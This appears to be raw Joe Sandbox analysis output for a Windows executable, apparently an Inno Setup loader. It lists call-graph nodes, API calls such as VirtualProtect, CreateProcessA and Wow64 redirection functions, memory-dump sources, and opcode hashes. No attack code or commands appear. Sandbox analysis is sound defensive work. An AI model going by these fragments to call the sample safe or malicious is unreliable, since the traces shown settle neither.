404bf5 5142->5126 5144 404f8b 5143->5144 5148 404fd9 5143->5148 5147 40505f 5144->5147 5144->5148 5146 404ff7 5146->5132 5147->5146 5157 404e38 5147->5157 5148->5146 5153 404df4 5148->5153 5151 403198 4 API calls 5150->5151 5152 404e56 5151->5152 5152->5132 5154 404e02 5153->5154 5160 404bfc 5154->5160 5156 404e30 5156->5148 5187 4039a4 5157->5187 5163 4059b0 5160->5163 5162 404c15 5162->5156 5164 4059be 5163->5164 5173 404cdc LoadStringA 5164->5173 5167 405194 33 API calls 5168 4059f6 5167->5168 5176 4031e8 5168->5176 5171 4031b8 4 API calls 5172 405a1b 5171->5172 5172->5162 5174 403278 18 API calls 5173->5174 5175 404d09 5174->5175 5175->5167 5177 4031ec 5176->5177 5180 4031fc 5176->5180 5177->5180 5182 403254 5177->5182 5178 403228 5178->5171 5180->5178 5181 4025ac 4 API calls 5180->5181 5181->5178 5183 403274 5182->5183 5184 403258 5182->5184 5183->5180 5185 402594 18 API calls 5184->5185 5186 403261 5185->5186 5186->5180 5188 4039ab 5187->5188 5193 4038b4 5188->5193 5190 4039cb 5191 403198 4 API calls 5190->5191 5192 4039d2 5191->5192 5192->5146 5194 4038d5 5193->5194 5195 4038c8 5193->5195 5197 403934 5194->5197 5198 4038db 5194->5198 5221 403780 5195->5221 5199 403993 5197->5199 5200 40393b 5197->5200 5201 4038e1 5198->5201 5202 4038ee 5198->5202 5203 4037f4 3 API calls 5199->5203 5204 403941 5200->5204 5205 40394b 5200->5205 5228 403894 5201->5228 5207 403894 6 API calls 5202->5207 5210 4038d0 5203->5210 5243 403864 5204->5243 5209 4037f4 3 API calls 5205->5209 5211 4038fc 5207->5211 5212 40395d 5209->5212 5210->5190 5233 4037f4 5211->5233 5215 403864 23 API calls 5212->5215 5214 403917 5239 40374c 5214->5239 5216 403976 5215->5216 5219 40374c VariantClear 5216->5219 5218 40392c 5218->5190 5220 40398b 5219->5220 5220->5190 5222 4037f0 5221->5222 5224 403744 5221->5224 5222->5210 5223 403793 VariantClear 5223->5224 5224->5221 5224->5223 5225 4037ab 5224->5225 5226 4037dc VariantCopyInd 5224->5226 5227 403198 4 API calls 5224->5227 5225->5210 5226->5222 5226->5224 5227->5224 5248 4036b8 5228->5248 5231 40374c VariantClear 5232 4038a9 5231->5232 5232->5210 5234 403845 VariantChangeTypeEx 5233->5234 5235 40380a VariantChangeTypeEx 5233->5235 5238 403832 5234->5238 5236 403826 5235->5236 5237 40374c VariantClear 5236->5237 5237->5238 5238->5214 5240 403759 5239->5240 5241 403766 5239->5241 5240->5241 5242 403779 VariantClear 5240->5242 5241->5218 5242->5218 5254 40369c SysStringLen 5243->5254 5246 40374c VariantClear 5247 403882 5246->5247 5247->5210 5249 4036cb 5248->5249 5250 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5249->5250 5251 4036db 5249->5251 5252 40372e 5250->5252 5253 4036ed MultiByteToWideChar SysAllocStringLen 5251->5253 5252->5231 5253->5252 5255 403610 21 API calls 5254->5255 5256 4036b3 5255->5256 5256->5246 5258 40594c 5257->5258 5259 404cdc 19 API calls 5258->5259 5260 405972 5259->5260 5261 4031e8 18 API calls 5260->5261 5262 40597d 5261->5262 5263 403198 4 API calls 5262->5263 5264 405992 5263->5264 5264->5142 5266 403198 4 API calls 5265->5266 5268 408cb1 5265->5268 5266->5268 5267 4031b8 4 API calls 5269 408d69 5267->5269 5270 408cc8 5268->5270 5271 403278 18 API calls 5268->5271 5273 408cdc 5268->5273 5274 4032fc 18 API calls 5268->5274 5269->5110 5272 4032fc 18 API calls 5270->5272 5271->5268 5272->5273 5273->5267 5274->5268 5276 4034fd 5275->5276 5283 40352d 5275->5283 5278 403526 5276->5278 5281 403509 5276->5281 5277 403198 4 API calls 5280 403517 5277->5280 5279 403254 18 API calls 5278->5279 5279->5283 5280->5041 5284 4025c4 5281->5284 5283->5277 5286 4025ca 5284->5286 5285 4025dc 5285->5280 5285->5285 5286->5285 5288 403154 5286->5288 5289 403164 5288->5289 5290 40318c TlsGetValue 5288->5290 5289->5285 5291 403196 5290->5291 5292 40316f 5290->5292 5291->5285 5296 40310c 5292->5296 5294 403174 TlsGetValue 5295 403184 5294->5295 5295->5285 5297 403120 LocalAlloc 5296->5297 5298 403116 5296->5298 5299 40313e TlsSetValue 5297->5299 5300 403132 5297->5300 5298->5297 5299->5300 5300->5294 5302 406b1c 5301->5302 5303 403278 18 API calls 5302->5303 5304 406b29 5303->5304 5311 403420 5304->5311 5306 406b31 5307 4031e8 18 API calls 5306->5307 5308 406b49 5307->5308 5309 403198 4 API calls 5308->5309 5310 406b6b 5309->5310 5310->5044 5312 403426 5311->5312 5314 403437 5311->5314 5313 403254 18 API calls 5312->5313 5312->5314 5313->5314 5314->5306 5316 4033bc 5315->5316 5317 403254 18 API calls 5316->5317 5318 4033cf 5317->5318 5319 4031e8 18 API calls 5318->5319 5320 4033f7 5319->5320 5322 402bd5 RaiseException 5321->5322 5323 402be6 5321->5323 5322->5323 5323->5067 5325 408e8e 5324->5325 5327 408ea6 5325->5327 5337 408e18 5325->5337 5328 408e18 18 API calls 5327->5328 5329 408eca 5327->5329 5328->5329 5340 407918 5329->5340 5331 408ee5 5332 408e18 18 API calls 5331->5332 5334 408ef8 5331->5334 5332->5334 5333 408e18 18 API calls 5333->5334 5334->5333 5335 403278 18 API calls 5334->5335 5336 408f27 5334->5336 5335->5334 5336->5069 5338 405890 18 API calls 5337->5338 5339 408e29 5338->5339 5339->5327 5343 4078c4 5340->5343 5344 4078d6 5343->5344 5345 4078e7 5343->5345 5346 4078db InterlockedExchange 5344->5346 5345->5331 5346->5345 5355 408f70 5347->5355 5349 408fd2 5350 408fd6 5349->5350 5351 408ff2 DeleteFileA GetLastError 5349->5351 5350->5079 5352 409010 5351->5352 5361 408fac 5352->5361 5356 408f7a 5355->5356 5357 408f7e 5355->5357 5356->5349 5358 408fa0 SetLastError 5357->5358 5359 408f87 Wow64DisableWow64FsRedirection 5357->5359 5360 408f9b 5358->5360 5359->5360 5360->5349 5362 408fb1 Wow64RevertWow64FsRedirection 5361->5362 5363 408fbb 5361->5363 5362->5363 5363->5079 5365 403566 5364->5365 5367 403578 5365->5367 5368 403604 5365->5368 5367->5092 5369 40357c 5368->5369 5374 40359b 5369->5374 5375 4035b6 5369->5375 5376 4035d0 5369->5376 5377 4035a0 5369->5377 5370 4035b1 5372 403198 4 API calls 5370->5372 5371 4035b8 5373 4031b8 4 API calls 5371->5373 5372->5375 5373->5375 5374->5377 5378 4035ec 5374->5378 5375->5365 5376->5375 5379 40357c 4 API calls 5376->5379 5377->5370 5377->5371 5378->5375 5380 403554 4 API calls 5378->5380 5379->5376 5380->5378 6671 401ab9 6672 401a96 6671->6672 6673 401aa9 RtlDeleteCriticalSection 6672->6673 6674 401a9f RtlLeaveCriticalSection 6672->6674 6674->6673

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 133 409bfb-409c08 VirtualProtect 132->133 133->121
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 2441996862-0
                                                                                            • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                            • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                            • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                            • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                            • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                            • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                            • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020824A0), ref: 0040966C
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                            • SetWindowLongA.USER32(0001042E,000000FC,00409960), ref: 0040AB15
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                            • DestroyWindow.USER32(0001042E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3757039580-3001827809
                                                                                            • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                            • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                            • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                            • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                            • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                            • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                            • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                            • SetWindowLongA.USER32(0001042E,000000FC,00409960), ref: 0040AB15
                                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                              • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8,00000000), ref: 00409A70
                                                                                              • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                              • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8), ref: 00409AA4
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                            • DestroyWindow.USER32(0001042E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3586484885-3001827809
                                                                                            • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                            • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                            • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                            • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8,00000000), ref: 00409A70
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                            • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8), ref: 00409AA4
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020824A0), ref: 0040966C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                            • String ID: D
                                                                                            • API String ID: 3356880605-2746444292
                                                                                            • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                            • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                            • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                            • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 149 4019c3-4019c8 RtlLeaveCriticalSection 145->149 150 4019cd 145->150 148 401983-401995 146->148 148->148 151 401997-4019a6 148->151 149->150 151->145
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                            • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                            • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                            • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                            • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                            • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                            • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                            • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: .tmp
                                                                                            • API String ID: 1375471231-2986845003
                                                                                            • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                            • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                            • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                            • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
